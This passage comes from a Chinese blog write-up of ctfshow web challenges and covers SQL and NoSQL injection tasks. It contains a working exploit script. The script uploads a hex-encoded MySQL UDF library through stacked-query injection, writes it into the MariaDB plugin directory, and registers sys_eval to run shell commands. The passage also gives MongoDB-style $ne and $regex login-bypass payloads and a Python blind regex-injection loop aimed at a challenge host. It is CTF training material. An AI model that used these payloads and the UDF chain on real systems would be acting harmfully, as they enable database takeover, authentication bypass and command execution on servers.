C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400'
codes=[]
for i in range(0,len(code),128):
    codes.append(code[i:min(i+128,len(code))])

#建临时表
#sql='''create table temp(data longblob)'''
#payload='''0';{};-- A'''.format(sql)
#requests.get(url+payload)

#清空临时表
sql='''delete from temp'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#插入第一段数据
sql='''insert into temp(data) values (0x{})'''.format(codes[0])
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#更新连接剩余数据
for k in range(1,len(codes)):
    sql='''update temp set data = concat(data,0x{})'''.format(codes[k])
    payload='''0';{};-- A'''.format(sql)
    requests.get(url+payload)

#10.3.18-MariaDB    
#写入so文件
sql='''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#引入自定义函数
sql='''create function sys_eval returns string soname 'udf.so\''''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#命令执行，结果更新到界面
sql='''update ctfshow_user set pass=(select sys_eval('cat /flag.her?'))'''
payload='''0';{};-- A'''.format(sql)
requests.get(url+payload)

#查看结果
r=requests.get(url[:-4]+'?page=1&limit=10')
print(r.text)

web249

参考 file

payload

?id[]=flag

web250

payload

username[$ne]=1&password[$ne]=1

web251

file 用上一题的payload 得出了admin的账号密码然后

username[$ne]=admin&password[$ne]=1

改成不是admin用户不太懂

web252

username[$ne]=1&password[$ne]=1
username[$ne]=admin&password[$ne]=1

然后还不能等于admin1 用正则

username[$regex]=^[^a].*$&password[$ne]=1

web253

盲注

import requests
url="http://2a39bed8-27b1-44c6-a90e-235e85cd3ce7.challenge.ctf.show:8080/api/"
flag=''
i=0
for i in range(50):
    for j in "ctf{}1234567890qweryuioplkjhgdsazxvbnm-_":
        data={
            'username[$regex]':'flag',
            'password[$regex]':f"^{flag+j}"
        }
        print(data)
        r=requests.post(url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)

CTF

ctfshow- web入门sql注入171-253

http://example.com/2021/03/30/OldBlog/ctf-show-web入门sql注入171-253/

作者

Autumn

发布于

2021年3月30日

许可协议

sql注入总结上一篇

ctfshow- web入门文件上传151-170 下一篇